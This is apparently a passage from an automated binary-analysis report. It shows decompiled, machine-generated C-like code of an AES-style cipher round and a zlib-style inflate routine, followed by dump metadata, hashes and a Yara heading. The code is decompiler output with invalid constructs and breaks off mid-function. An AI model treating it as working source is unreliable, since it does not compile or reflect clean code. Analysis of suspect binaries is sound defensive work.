            				signed int _v36;
            				char _v48;
            				signed char* _t154;
            				signed char* _t157;
            				signed char* _t158;
            				signed char* _t161;
            				signed char* _t162;
            				signed char* _t165;
            				signed int _t169;
            				signed int _t170;
            				signed char* _t175;
            				signed int _t243;
            				signed int _t278;
            				signed int _t288;
            				signed int _t302;
            				signed int* _t328;
            				signed int _t332;
            				signed int* _t342;
            				intOrPtr _t343;
            				void* _t344;
            				signed int _t345;
            
            				_t343 = __ecx;
            				_v32 = __ecx;
            				if( *((char*)(__ecx + 4)) == 0) {
            					__imp__??0exception@@QAE@ABQBD@Z(0x40f570);
            					_push(0x40d570);
            					_push( &_v48);
            					L0040776E();
            				}
            				_t154 = _a4;
            				_t157 =  &(_t154[3]);
            				_t158 =  &(_t157[1]);
            				_t243 = (( *_t154 & 0x000000ff) << 0x00000018 | (_t154[1] & 0x000000ff) << 0x00000010 |  *_t157 & 0x000000ff) ^  *(_t343 + 0x1e8);
            				_v24 = _t243;
            				_t161 =  &(_t158[3]);
            				_t162 =  &(_t161[1]);
            				_v20 = ((_t157[1] & 0x000000ff) << 0x00000018 | (_t158[1] & 0x000000ff) << 0x00000010 |  *_t161 & 0x000000ff) ^  *(_t343 + 0x1ec);
            				_t165 =  &(_t162[3]);
            				_t166 =  &(_t165[1]);
            				_v16 = (( *_t162 & 0x000000ff) << 0x00000018 | (_t162[1] & 0x000000ff) << 0x00000010 |  *_t165 & 0x000000ff) ^  *(_t343 + 0x1f0);
            				_t169 =  *(_t343 + 0x410);
            				_v36 = _t169;
            				_v12 = ((_t165[1] & 0x000000ff) << 0x00000018 | (_t166[1] & 0x000000ff) << 0x00000010) ^  *(_t343 + 0x1f4);
            				if(_t169 > 1) {
            					_t328 = _t343 + 0x210;
            					_a4 = _t328;
            					_v8 = _t169 - 1;
            					do {
            						_t332 =  *0x00409BFC ^  *0x00409FFC;
            						_v28 = _t332;
            						_v28 = _t332 ^  *0x0040A3FC ^  *(0x40a7fc + (_t243 & 0x000000ff) * 4) ^ _a4[1];
            						_v16 =  *0x00409BFC ^  *0x00409FFC ^  *0x0040A3FC ^  *(0x40a7fc + (_v12 & 0x000000ff) * 4) ^  *_t328;
            						_v12 = _v28;
            						_v20 =  *0x0040A3FC ^  *0x00409BFC ^  *0x00409FFC ^  *(0x40a7fc + (_v16 & 0x000000ff) * 4) ^  *(_t328 - 4);
            						_t342 = _a4;
            						_t243 =  *0x00409FFC ^  *0x0040A3FC ^  *0x00409BFC ^  *(0x40a7fc + (_v20 & 0x000000ff) * 4) ^  *(_t342 - 8);
            						_t328 = _t342 + 0x20;
            						_t82 =  &_v8;
            						 *_t82 = _v8 - 1;
            						_a4 = _t328;
            						_v24 = _t243;
            					} while ( *_t82 != 0);
            					_t343 = _v32;
            					_t169 = _v36;
            				}
            				_t170 = _t169 << 5;
            				_t278 =  *(_t343 + 0x1e8 + _t170);
            				_t344 = _t343 + 0x1e8 + _t170;
            				_v8 = _t278;
            				_t175 = _a8;
            				 *_t175 =  *0x00408AFC ^ _t278 >> 0x00000018;
            				_t175[1] =  *0x00408AFC ^ _t278 >> 0x00000010;
            				_t175[2] =  *0x00408AFC ^ _v8 >> 0x00000008;
            				_t175[3] =  *((_v20 & 0x000000ff) + 0x408afc) ^ _v8;
            				_t288 =  *(_t344 + 4);
            				_v8 = _t288;
            				_t175[4] =  *0x00408AFC ^ _t288 >> 0x00000018;
            				_t175[5] =  *0x00408AFC ^ _v8 >> 0x00000010;
            				_t175[6] =  *0x00408AFC ^ _v8 >> 0x00000008;
            				_t175[7] =  *((_v16 & 0x000000ff) + 0x408afc) ^ _v8;
            				_t302 =  *(_t344 + 8);
            				_v8 = _t302;
            				_t175[8] =  *0x00408AFC ^ _t302 >> 0x00000018;
            				_t175[9] =  *0x00408AFC ^ _v8 >> 0x00000010;
            				_t175[0xa] =  *0x00408AFC ^ _v8 >> 0x00000008;
            				_t175[0xb] =  *((_v12 & 0x000000ff) + 0x408afc) ^ _v8;
            				_t345 =  *(_t344 + 0xc);
            				_v8 = _t345;
            				_t175[0xc] =  *0x00408AFC ^ _t345 >> 0x00000018;
            				_t175[0xd] =  *0x00408AFC ^ _t345 >> 0x00000010;
            				_t175[0xe] =  *0x00408AFC ^ _t345 >> 0x00000008;
            				_t175[0xf] =  *((_t243 & 0x000000ff) + 0x408afc) ^ _v8;
            				return _t175;
            			}

            APIs
            • ??0exception@@QAE@ABQBD@Z.MSVCRT(0040F570,?,?,?,?,?,?,004037DC,00000002,?,?,?,?), ref: 004031D6
            • _CxxThrowException.MSVCRT(?,0040D570,?,?,?,?,?,004037DC,00000002,?,?,?,?), ref: 004031E5
            Memory Dump Source
            • Source File: 00000002.00000002.255070484.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
            • Associated: 00000002.00000002.255064310.0000000000400000.00000002.00000001.01000000.00000005.sdmp
            • Associated: 00000002.00000002.255084606.0000000000408000.00000002.00000001.01000000.00000005.sdmp
            • Associated: 00000002.00000002.255096631.000000000040E000.00000008.00000001.01000000.00000005.sdmp
            • Associated: 00000002.00000002.255115219.0000000000410000.00000002.00000001.01000000.00000005.sdmp
            Yara matches
            Similarity
            • API ID: ??0exception@@ExceptionThrow
            • String ID:
            • API String ID: 941485209-0
            • Opcode ID: 0dda08770b2cfa47ca0284abc8234425fc657ac4a7c18576e4d0461ed08ab4c9
            • Instruction ID: bcf4991698fce177fafabfcfbf4d003d7da0a1e91b0dfae35dbc96c431f9713a
            • Opcode Fuzzy Hash: 0dda08770b2cfa47ca0284abc8234425fc657ac4a7c18576e4d0461ed08ab4c9
            • Instruction Fuzzy Hash: 43B1A135A081D99EDB05CFB984A04EAFFF2AF8E200B4ED1E6C9D4AB713C5705615DB84
            Uniqueness

            Uniqueness Score: -1.00%

            C-Code - Quality: 89%
            			E004043B7() {
            				void* __ebx;
            				void** __edi;
            				void* __esi;
            				signed int _t426;
            				signed int _t427;
            				void* _t434;
            				signed int _t436;
            				unsigned int _t438;
            				void* _t442;
            				void* _t448;
            				void* _t455;
            				signed int _t456;
            				signed int _t461;
            				signed char* _t476;
            				signed int _t482;
            				signed int _t485;
            				signed int* _t488;
            				void* _t490;
            				void* _t492;
            				void* _t493;
            
            				_t490 = _t492;
            				_t493 = _t492 - 0x2c;
            				_t488 =  *(_t490 + 8);
            				_t485 =  *(_t490 + 0xc);
            				_t482 = _t488[0xd];
            				_t476 =  *_t485;
            				 *(_t490 - 4) =  *(_t485 + 4);
            				 *(_t490 + 8) = _t488[8];
            				 *(_t490 + 0xc) = _t488[7];
            				_t426 = _t488[0xc];
            				 *(_t490 - 8) = _t482;
            				if(_t482 >= _t426) {
            					_t479 = _t488[0xb] - _t482;
            					__eflags = _t479;
            				} else {
            					_t479 = _t426 - _t482 - 1;
            				}
            				_t427 =  *_t488;
            				 *(_t490 - 0x10) = _t479;
            				if(_t427 > 9) {
            					L99:
            					_push(0xfffffffe);
            					_t488[8] =  *(_t490 + 8);
            					_t488[7] =  *(_t490 + 0xc);
            					 *(_t485 + 4) =  *(_t490 - 4);
            					 *_t485 = _t476;
            					_t320 = _t485 + 8;
            					 *_t320 =  *(_t485 + 8) + _t476 -  *_t485;
            					__eflags =  *_t320;
            					_t488[0xd] =  *(_t490 - 8);
            					goto L100;
            				} else {
            					while(1) {
            						switch( *((intOrPtr*)(_t427 * 4 +  &M00404BBD))) {
            							case 0:
            								goto L7;
            							case 1:
            								goto L20;
            							case 2:
            								goto L27;
            							case 3:
            								goto L50;
            							case 4:
            								goto L58;
            							case 5:
            								goto L68;
            							case 6:
            								goto L92;
            							case 7:
            								goto L118;
            							case 8:
            								goto L122;
            							case 9:
            								goto L104;
            						}
            						L92:
            						__eax =  *(__ebp + 8);
            						 *(__esi + 0x20) =  *(__ebp + 8);
            						__eax =  *(__ebp + 0xc);
            						 *(__esi + 0x1c) =  *(__ebp + 0xc);
            						__eax =  *(__ebp - 4);
            						__edi[1] =  *(__ebp - 4);
            						__ebx = __ebx -  *__edi;
            						 *__edi = __ebx;
            						__edi[2] = __edi[2] + __ebx -  *__edi;
            						__eax =  *(__ebp - 8);
            						 *(__esi + 0x34) =  *(__ebp - 8);
            						__eax = E00403CFC(__esi, __edi,  *(__ebp + 0x10));
            						__eflags = __eax - 1;
            						if(__eax != 1) {
            							L120:
            							_push(__eax);
            							L100:
            							_push(_t485);
            							_push(_t488);
            							_t434 = E00403BD6(_t479);
            							L101:
            							return _t434;
            						}
            						 *(__ebp + 0x10) =  *(__ebp + 0x10) & 0x00000000;
            						E004042AF( *(__esi + 4), __edi) = __edi[1];
            						__ebx =  *__edi;
            						 *(__ebp - 4) = __edi[1];
            						__eax =  *(__esi + 0x20);
            						_pop(__ecx);
            						 *(__ebp + 8) =  *(__esi + 0x20);
            						__eax =  *(__esi + 0x1c);
            						_pop(__ecx);
            						__ecx =  *(__esi + 0x34);
            						 *(__ebp + 0xc) =  *(__esi + 0x1c);
            						__eax =  *(__esi + 0x30);
            						 *(__ebp - 8) = __ecx;
            						__eflags = __ecx - __eax;
            						if(__ecx >= __eax) {
            							__eax =  *(__esi + 0x2c);
            							__eax =  *(__esi + 0x2c) -  *(__ebp - 8);
            							__eflags = __eax;
            						} else {
            							__eax = __eax - __ecx;
            							__eax = __eax - 1;
            						}
            						__eflags =  *(__esi + 0x18);
            						 *(__ebp - 0x10) = __eax;
            						if( *(__esi + 0x18) != 0) {
            							 *__esi = 7;
            							goto L118;
            						} else {
            							 *__esi =  *__esi & 0x00000000;
            							__eflags =  *__esi;
            							L98:
            							_t427 =  *_t488;
            							__eflags = _t427 - 9;
            							if(_t427 <= 9) {
            								_t479 =  *(_t490 - 0x10);
            								continue;
            							}
            							goto L99;
            						}
            						while(1) {
            							L68:
            							__eax =  *(__esi + 4);
            							__ecx =  *(__esi + 8);
            							__edx = __eax;
            							__eax = __eax & 0x0000001f;
            							__edx = __edx >> 5;
            							__edx = __edx & 0x0000001f;
            							_t187 = __eax + 0x102; // 0x102
            							__eax = __edx + _t187;
            							__eflags = __ecx - __edx + _t187;
            							if(__ecx >= __edx + _t187) {
            								break;
            							}
            							__eax =  *(__esi + 0x10);
            							while(1) {
            								__eflags =  *(__ebp + 0xc) - __eax;
            								if( *(__ebp + 0xc) >= __eax) {
            									break;
            								}
            								__eflags =  *(__ebp - 4);
            								if( *(__ebp - 4) == 0) {
            									L107:
            									_t488[8] =  *(_t490 + 8);
            									_t488[7] =  *(_t490 + 0xc);
            									_t349 = _t485 + 4;
            									 *_t349 =  *(_t485 + 4) & 0x00000000;
            									__eflags =  *_t349;
            									L108:
            									_push( *(_t490 + 0x10));
            									 *_t485 = _t476;
            									 *(_t485 + 8) =  *(_t485 + 8) + _t476 -  *_t485;
            									_t488[0xd] =  *(_t490 - 8);
            									goto L100;
            								}
            								__edx =  *__ebx & 0x000000ff;
            								__ecx =  *(__ebp + 0xc);
            								 *(__ebp + 0x10) =  *(__ebp + 0x10) & 0x00000000;
            								 *(__ebp - 4) =  *(__ebp - 4) - 1;
            								__edx = ( *__ebx & 0x000000ff) << __cl;
            								 *(__ebp + 8) =  *(__ebp + 8) | ( *__ebx & 0x000000ff) << __cl;
            								__ebx = __ebx + 1;
            								 *(__ebp + 0xc) =  *(__ebp + 0xc) + 8;
            							}
            							__eax =  *(0x40bca8 + __eax * 4);
            							__ecx =  *(__esi + 0x14);
            							__eax = __eax &  *(__ebp + 8);
            							__edx =  *(__ecx + 4 + __eax * 8);
            							__eax = __ecx + __eax * 8;
            							__eflags = __edx - 0x10;
            							 *(__ebp - 0x14) = __edx;
            							__ecx =  *(__eax + 1) & 0x000000ff;
            							 *(__ebp - 0xc) = __ecx;
            							if(__edx >= 0x10) {
            								__eflags = __edx - 0x12;
            								if(__edx != 0x12) {
            									_t222 = __edx - 0xe; // -14
            									__eax = _t222;
            								} else {
            									__eax = 7;
            								}
            								__ecx = 0;
            								__eflags = __edx - 0x12;
            								0 | __eflags != 0x00000000 = (__eflags != 0) - 1;
            								__ecx = (__eflags != 0x00000000) - 0x00000001 & 0x00000008;
            								__ecx = ((__eflags != 0x00000000) - 0x00000001 & 0x00000008) + 3;
            								__eflags = __ecx;
            								 *(__ebp - 0x10) = __ecx;
            								while(1) {
            									__ecx =  *(__ebp - 0xc);
            									__edx = __eax + __ecx;
            									__eflags =  *(__ebp + 0xc) - __eax + __ecx;
            									if( *(__ebp + 0xc) >= __eax + __ecx) {
            										break;
            									}
            									__eflags =  *(__ebp - 4);
            									if( *(__ebp - 4) == 0) {
            										goto L107;
            									}
            									__edx =  *__ebx & 0x000000ff;
            									__ecx =  *(__ebp + 0xc);
            									 *(__ebp + 0x10) =  *(__ebp + 0x10) & 0x00000000;
            									 *(__ebp - 4) =  *(__ebp - 4) - 1;
            									__edx = ( *__ebx & 0x000000ff) << __cl;
            									 *(__ebp + 8) =  *(__ebp + 8) | ( *__ebx & 0x000000ff) << __cl;
            									__ebx = __ebx + 1;
            									 *(__ebp + 0xc) =  *(__ebp + 0xc) + 8;
            								}
            								 *(__ebp + 8) =  *(__ebp + 8) >> __cl;
            								 *(0x40bca8 + __eax * 4) =  *(0x40bca8 + __eax * 4) &  *(__ebp + 8);
            								 *(__ebp - 0x10) =  *(__ebp - 0x10) + ( *(0x40bca8 + __eax * 4) &  *(__ebp + 8));
            								__ecx = __eax;
            								 *(__ebp + 8) =  *(__ebp + 8) >> __cl;
            								__ecx =  *(__ebp - 0xc);
            								__eax = __eax +  *(__ebp - 0xc);
            								__ecx =  *(__esi + 8);
            								 *(__ebp + 0xc) =  *(__ebp + 0xc) - __eax;
            								__eax =  *(__esi + 4);
            								__edx = __eax;
            								__eax = __eax & 0x0000001f;
            								__edx = __edx >> 5;
            								__edx = __edx & 0x0000001f;
            								_t254 = __eax + 0x102; // 0x102
            								__eax = __edx + _t254;
            								 *(__ebp - 0x10) =  *(__ebp - 0x10) + __ecx;
            								__eflags =  *(__ebp - 0x10) + __ecx - __eax;
            								if( *(__ebp - 0x10) + __ecx > __eax) {
            									L111:
            									__edi[9](__edi[0xa],  *(__esi + 0xc)) =  *(__ebp + 8);
            									 *__esi = 9;
            									__edi[6] = "invalid bit length repeat";
            									 *(__esi + 0x20) =  *(__ebp + 8);
            									__eax =  *(__ebp + 0xc);
            									 *(__esi + 0x1c) =  *(__ebp + 0xc);
            									__eax =  *(__ebp - 4);
            									__edi[1] =  *(__ebp - 4);
            									__ebx = __ebx -  *__edi;
            									 *__edi = __ebx;
            									__edi[2] = __edi[2] + __ebx -  *__edi;
            									__eax =  *(__ebp - 8);
            									 *(__esi + 0x34) =  *(__ebp - 8);
            									__eax = E00403BD6(__ecx, __esi, __edi, 0xfffffffd);
            									goto L101;
            								}
            								__eflags =  *(__ebp - 0x14) - 0x10;
            								if( *(__ebp - 0x14) != 0x10) {
            									__eax = 0;
            									__eflags = 0;
            									do {
            										L87:
            										__edx =  *(__esi + 0xc);
            										 *( *(__esi + 0xc) + __ecx * 4) = __eax;
            										__ecx = __ecx + 1;
            										_t264 = __ebp - 0x10;
            										 *_t264 =  *(__ebp - 0x10) - 1;
            										__eflags =  *_t264;
            									} while ( *_t264 != 0);
            									 *(__esi + 8) = __ecx;
            									continue;
            								}
            								__eflags = __ecx - 1;
            								if(__ecx < 1) {
            									goto L111;
            								}
            								__eax =  *(__esi + 0xc);
            								__eax =  *( *(__esi + 0xc) + __ecx * 4 - 4);
            								goto L87;
            							}
            							 *(__ebp + 8) =  *(__ebp + 8) >> __cl;
            							__eax = __ecx;
            							__ecx =  *(__esi + 0xc);
            							 *(__ebp + 0xc) =  *(__ebp + 0xc) - __eax;
            							__eax =  *(__esi + 8);
            							 *( *(__esi + 0xc) +  *(__esi + 8) * 4) = __edx;
            							 *(__esi + 8) =  *(__esi + 8) + 1;
            						}
            						__ecx = __ebp - 0x28;
            						__eax =  *(__esi + 4);
            						 *(__esi + 0x14) =  *(__esi + 0x14) & 0x00000000;
            						 *(__ebp - 0x14) = 9;
            						__ebp - 0x2c = __ebp - 0x10;
            						__ecx = __ebp - 0x14;
            						__ecx = __eax;
            						__eax = __eax & 0x0000001f;
            						__ecx = __ecx >> 5;
            						__ecx = __ecx & 0x0000001f;
            						__eax = __eax + 0x101;
            						__ecx = __ecx + 1;
            						 *(__ebp - 0x10) = 6;
            						__eax = E0040501F(__eax, __ecx,  *(__esi + 0xc), __ebp - 0x14, __ebp - 0x10, __ebp - 0x2c, __ebp - 0x28,  *((intOrPtr*)(__esi + 0x24)), __edi);
            						 *(__ebp - 0xc) = __eax;
            						__eflags = __eax;
            						if(__eax != 0) {
            							__eflags =  *(__ebp - 0xc) - 0xfffffffd;
            							L113:
            							if(__eflags == 0) {
            								__eax = __edi[9](__edi[0xa],  *(__esi + 0xc));
            								_pop(__ecx);
            								 *__esi = 9;
            								_pop(__ecx);
            							}
            							__eax =  *(__ebp + 8);
            							_push( *(__ebp - 0xc));
            							 *(__esi + 0x20) =  *(__ebp + 8);
            							__eax =  *(__ebp + 0xc);
            							 *(__esi + 0x1c) =  *(__ebp + 0xc);
            							__eax =  *(__ebp - 4);
            							__edi[1] =  *(__ebp - 4);
            							__ebx = __ebx -  *__edi;
            							 *__edi = __ebx;
            							__edi[2] = __edi[2] + __ebx -  *__edi;
            							__eax =  *(__ebp - 8);
            							 *(__esi + 0x34) =  *(__ebp - 8);
            							goto L100;
            						}
            						__eax = E00403CC8( *(__ebp - 0x14),  *(__ebp - 0x10),  *((intOrPtr*)(__ebp - 0x2c)),  *(__ebp - 0x28), __edi);
            						__eflags = __eax;
            						if(__eax == 0) {
            							L116:
            							_push(0xfffffffc);
            							_t488[8] =  *(_t490 + 8);
            							_t488[7] =  *(_t490 + 0xc);
            							 *(_t485 + 4) =  *(_t490 - 4);
            							 *_t485 = _t476;
            							 *(_t485 + 8) =  *(_t485 + 8) + _t476 -  *_t485;
            							_t488[0xd] =  *(_t490 - 8);
            							goto L100;
            						}
            						 *(__esi + 4) = __eax;
            						__eax = __edi[9](__edi[0xa],  *(__esi + 0xc));
            						_pop(__ecx);
            						 *__esi = 6;
            						_pop(__ecx);
            						goto L92;
            						L58:
            						 *(__esi + 4) =  *(__esi + 4) >> 0xa;
            						__eax = ( *(__esi + 4) >> 0xa) + 4;
            						__eflags =  *(__esi + 8) - ( *(__esi + 4) >> 0xa) + 4;
            						if( *(__esi + 8) >= ( *(__esi + 4) >> 0xa) + 4) {
            							while(1) {
            								L64:
            								__eflags =  *(__esi + 8) - 0x13;
            								if( *(__esi + 8) >= 0x13) {
            									break;
            								}
            								__eax =  *(__esi + 8);
            								__ecx =  *(__esi + 0xc);
            								 *(__ecx +  *(0x40cdf0 +  *(__esi + 8) * 4) * 4) =  *( *(__esi + 0xc) +  *(0x40cdf0 +  *(__esi + 8) * 4) * 4) & 0x00000000;
            								 *(__esi + 8) =  *(__esi + 8) + 1;
            							}
            							__ecx = __esi + 0x14;
            							__eax = __esi + 0x10;
            							 *(__esi + 0x10) = 7;
            							__eax = E00404FA0( *(__esi + 0xc), __eax, __ecx,  *((intOrPtr*)(__esi + 0x24)), __edi);
            							 *(__ebp - 0xc) = __eax;
            							__eflags = __eax;
            							if(__eax != 0) {
            								__eflags =  *(__ebp - 0xc) - 0xfffffffd;
            								goto L113;
            							}
            							_t182 = __esi + 8;
            							 *_t182 =  *(__esi + 8) & __eax;
            							__eflags =  *_t182;
            							 *__esi = 5;
            							goto L68;
            						} else {
            							goto L59;
            						}
            						do {
            							L59:
            							__ecx =  *(__ebp + 0xc);
            							while(1) {
            								__eflags = __ecx - 3;
            								if(__ecx >= 3) {
            									goto L63;
            								}
            								__eflags =  *(__ebp - 4);
            								if( *(__ebp - 4) == 0) {
            									goto L107;
            								}
            								__eax =  *__ebx & 0x000000ff;
            								 *(__ebp + 0x10) =  *(__ebp + 0x10) & 0x00000000;
            								 *(__ebp - 4) =  *(__ebp - 4) - 1;
            								__eax = ( *__ebx & 0x000000ff) << __cl;
            								 *(__ebp + 8) =  *(__ebp + 8) | ( *__ebx & 0x000000ff) << __cl;
            								__ebx = __ebx + 1;
            								__ecx = __ecx + 8;
            								 *(__ebp + 0xc) = __ecx;
            							}
            							L63:
            							__ecx =  *(__esi + 8);
            							__eax =  *(__ebp + 8);
            							__edx =  *(__esi + 0xc);
            							__eax =  *(__ebp + 8) & 0x00000007;
            							__ecx =  *(0x40cdf0 +  *(__esi + 8) * 4);
            							 *(__ebp + 0xc) =  *(__ebp + 0xc) - 3;
            							 *(__ebp + 8) =  *(__ebp + 8) >> 3;
            							 *( *(__esi + 0xc) +  *(0x40cdf0 +  *(__esi + 8) * 4) * 4) =  *(__ebp + 8) & 0x00000007;
            							__ecx =  *(__esi + 4);
            							 *(__esi + 8) =  *(__esi + 8) + 1;
            							__eax =  *(__esi + 8);
            							 *(__esi + 4) >> 0xa = ( *(__esi + 4) >> 0xa) + 4;
            							__eflags =  *(__esi + 8) - ( *(__esi + 4) >> 0xa) + 4;
            						} while ( *(__esi + 8) < ( *(__esi + 4) >> 0xa) + 4);
            						goto L64;
            						L50:
            						__ecx =  *(__ebp + 0xc);
            						while(1) {
            							__eflags = __ecx - 0xe;
            							if(__ecx >= 0xe) {
            								break;
            							}
            							__eflags =  *(__ebp - 4);
            							if( *(__ebp - 4) == 0) {
            								goto L107;
            							}
            							__eax =  *__ebx & 0x000000ff;
            							 *(__ebp + 0x10) =  *(__ebp + 0x10) & 0x00000000;
            							 *(__ebp - 4) =  *(__ebp - 4) - 1;
            							__eax = ( *__ebx & 0x000000ff) << __cl;
            							 *(__ebp + 8) =  *(__ebp + 8) | ( *__ebx & 0x000000ff) << __cl;
            							__ebx = __ebx + 1;
            							__ecx = __ecx + 8;
            							 *(__ebp + 0xc) = __ecx;
            						}
            						__eax =  *(__ebp + 8);
            						__eax =  *(__ebp + 8) & 0x00003fff;
            						__ecx = __eax;
            						 *(__esi + 4) = __eax;
            						__ecx = __eax & 0x0000001f;
            						__eflags = __ecx - 0x1d;
            						if(__ecx > 0x1d) {
            							L109:
            							 *__esi = 9;
            							__edi[6] = "too many length or distance symbols";
            							break;
            						}
            						__eax = __eax & 0x000003e0;
            						__eflags = (__eax & 0x000003e0) - 0x3a0;
            						if((__eax & 0x000003e0) > 0x3a0) {
            							goto L109;
            						}
            						__eax = __eax >> 5;
            						__eax = __eax & 0x0000001f;
            						__eax = __edi[8](__edi[0xa], __eax, 4);
            						__esp = __esp + 0xc;
            						 *(__esi + 0xc) = __eax;
            						__eflags = __eax;
            						if(__eax == 0) {
            							goto L116;
            						}
            						 *(__ebp + 8) =  *(__ebp + 8) >> 0xe;
            						 *(__ebp + 0xc) =  *(__ebp + 0xc) - 0xe;
            						_t138 = __esi + 8;
            						 *_t138 =  *(__esi + 8) & 0x00000000;
            						__eflags =  *_t138;
            						 *__esi = 4;
            						goto L58;
            						L27:
            						__eflags =  *(__ebp - 4);
            						if( *(__ebp - 4) == 0) {
            							goto L107;
            						}
            						__eflags = __ecx;
            						if(__ecx != 0) {
            							L44:
            							__eax =  *(__esi + 4);
            							__ecx =  *(__ebp - 4);
            							 *(__ebp + 0x10) =  *(__ebp + 0x10) & 0x00000000;
            							__eflags = __eax - __ecx;
            							 *(__ebp - 0xc) = __eax;
            							if(__eax > __ecx) {
            								 *(__ebp - 0xc) = __ecx;
            							}
            							__eax =  *(__ebp - 0x10);
            							__eflags =  *(__ebp - 0xc) - __eax;
            							if( *(__ebp - 0xc) > __eax) {
            								 *(__ebp - 0xc) = __eax;
            							}
            							__eax = memcpy( *(__ebp - 8), __ebx,  *(__ebp - 0xc));
            							__eax =  *(__ebp - 0xc);
            							__esp = __esp + 0xc;
            							 *(__ebp - 4) =  *(__ebp - 4) - __eax;
            							 *(__ebp - 8) =  *(__ebp - 8) + __eax;
            							 *(__ebp - 0x10) =  *(__ebp - 0x10) - __eax;
            							__ebx = __ebx + __eax;
            							_t115 = __esi + 4;
            							 *_t115 =  *(__esi + 4) - __eax;
            							__eflags =  *_t115;
            							if( *_t115 == 0) {
            								L49:
            								 *(__esi + 0x18) =  ~( *(__esi + 0x18));
            								asm("sbb eax, eax");
            								__eax =  ~( *(__esi + 0x18)) & 0x00000007;
            								L16:
            								 *_t488 = _t456;
            							}
            							goto L98;
            						}
            						__ecx =  *(__esi + 0x2c);
            						__eflags = __edx - __ecx;
            						if(__edx != __ecx) {
            							L35:
            							__eax =  *(__ebp - 8);
            							 *(__esi + 0x34) =  *(__ebp - 8);
            							__eax = E00403BD6(__ecx, __esi, __edi,  *(__ebp + 0x10));
            							__ecx =  *(__esi + 0x30);
            							 *(__ebp + 0x10) = __eax;
            							__eax =  *(__esi + 0x34);
            							__eflags = __eax - __ecx;
            							 *(__ebp - 8) = __eax;
            							if(__eax >= __ecx) {
            								__edx =  *(__esi + 0x2c);
            								__edx =  *(__esi + 0x2c) -  *(__ebp - 8);
            								__eflags = __edx;
            								 *(__ebp - 0x10) = __edx;
            							} else {
            								__ecx = __ecx -  *(__ebp - 8);
            								__eax = __ecx -  *(__ebp - 8) - 1;
            								 *(__ebp - 0x10) = __ecx -  *(__ebp - 8) - 1;
            							}
            							__edx =  *(__esi + 0x2c);
            							__eflags =  *(__ebp - 8) - __edx;
            							if( *(__ebp - 8) == __edx) {
            								__eax =  *(__esi + 0x28);
            								__eflags = __eax - __ecx;
            								if(__eflags != 0) {
            									 *(__ebp - 8) = __eax;
            									if(__eflags >= 0) {
            										__edx = __edx - __eax;
            										__eflags = __edx;
            										 *(__ebp - 0x10) = __edx;
            									} else {
            										__ecx = __ecx - __eax;
            										__ecx = __ecx - 1;
            										 *(__ebp - 0x10) = __ecx;
            									}
            								}
            							}
            							__eflags =  *(__ebp - 0x10);
            							if( *(__ebp - 0x10) == 0) {
            								__eax =  *(__ebp + 8);
            								 *(__esi + 0x20) =  *(__ebp + 8);
            								__eax =  *(__ebp + 0xc);
            								 *(__esi + 0x1c) =  *(__ebp + 0xc);
            								__eax =  *(__ebp - 4);
            								__edi[1] =  *(__ebp - 4);
            								goto L108;
            							} else {
            								goto L44;
            							}
            						}
            						__eax =  *(__esi + 0x30);
            						__edx =  *(__esi + 0x28);
            						__eflags = __edx - __eax;
            						if(__eflags == 0) {
            							goto L35;
            						}
            						 *(__ebp - 8) = __edx;
            						if(__eflags >= 0) {
            							__ecx = __ecx - __edx;
            							__eflags = __ecx;
            							 *(__ebp - 0x10) = __ecx;
            						} else {
            							__eax = __eax - __edx;
            							 *(__ebp - 0x10) = __eax;
            						}
            						__eflags =  *(__ebp - 0x10);
            						if( *(__ebp - 0x10) != 0) {
            							goto L44;
            						} else {
            							goto L35;
            						}
            						L20:
            						__ecx =  *(__ebp + 0xc);
            						while(1) {
            							__eflags = __ecx - 0x20;
            							if(__ecx >= 0x20) {
            								break;
            							}
            							__eflags =  *(__ebp - 4);
            							if( *(__ebp - 4) == 0) {
            								goto L107;
            							}
            							__eax =  *__ebx & 0x000000ff;
            							 *(__ebp + 0x10) =  *(__ebp + 0x10) & 0x00000000;
            							 *(__ebp - 4) =  *(__ebp - 4) - 1;
            							__eax = ( *__ebx & 0x000000ff) << __cl;
            							 *(__ebp + 8) =  *(__ebp + 8) | ( *__ebx & 0x000000ff) << __cl;
            							__ebx = __ebx + 1;
            							__ecx = __ecx + 8;
            							 *(__ebp + 0xc) = __ecx;
            						}
            						__ecx =  *(__ebp + 8);
            						__eax =  *(__ebp + 8);
            						__ecx =  !( *(__ebp + 8));
            						__eax =  *(__ebp + 8) & 0x0000ffff;
            						__ecx =  !( *(__ebp + 8)) >> 0x10;
            						__ecx =  !( *(__ebp + 8)) >> 0x00000010 ^ __eax;
            						__eflags = __ecx;
            						if(__ecx != 0) {
            							 *__esi = 9;
            							__edi[6] = "invalid stored block lengths";
            							break;
            						}
            						 *(__esi + 4) = __eax;
            						__eax = 0;
            						__eflags =  *(__esi + 4);
            						 *(__ebp + 0xc) = 0;
            						 *(__ebp + 8) = 0;
            						if( *(__esi + 4) == 0) {
            							goto L49;
            						}
            						__eax = 2;
            						goto L16;
            						L7:
            						while( *(_t490 + 0xc) < 3) {
            							if( *(_t490 - 4) == 0) {
            								goto L107;
            							}
            							_t479 =  *(_t490 + 0xc);
            							 *(_t490 + 0x10) =  *(_t490 + 0x10) & 0x00000000;
            							 *(_t490 - 4) =  *(_t490 - 4) - 1;
            							 *(_t490 + 8) =  *(_t490 + 8) | ( *_t476 & 0x000000ff) <<  *(_t490 + 0xc);
            							_t476 =  &(_t476[1]);
            							 *(_t490 + 0xc) =  *(_t490 + 0xc) + 8;
            						}
            						_t436 =  *(_t490 + 8) & 0x00000007;
            						_t479 = _t436 & 0x00000001;
            						_t438 = _t436 >> 1;
            						__eflags = _t438;
            						_t488[6] = _t436 & 0x00000001;
            						if(_t438 == 0) {
            							 *(_t490 + 0xc) =  *(_t490 + 0xc) - 3;
            							 *_t488 = 1;
            							_t479 =  *(_t490 + 0xc) & 0x00000007;
            							 *(_t490 + 0xc) =  *(_t490 + 0xc) - _t479;
            							 *(_t490 + 8) =  *(_t490 + 8) >> 3 >> _t479;
            							goto L98;
            						}
            						_t442 = _t438 - 1;
            						__eflags = _t442;
            						if(_t442 == 0) {
            							_push(_t485);
            							E00405122(_t490 - 0x24, _t490 - 0x20, _t490 - 0x1c, _t490 - 0x18);
            							_t448 = E00403CC8( *((intOrPtr*)(_t490 - 0x24)),  *((intOrPtr*)(_t490 - 0x20)),  *((intOrPtr*)(_t490 - 0x1c)),  *((intOrPtr*)(_t490 - 0x18)), _t485);
            							_t493 = _t493 + 0x28;
            							_t488[1] = _t448;
            							__eflags = _t448;
            							if(_t448 == 0) {
            								goto L116;
            							}
            							 *(_t490 + 8) =  *(_t490 + 8) >> 3;
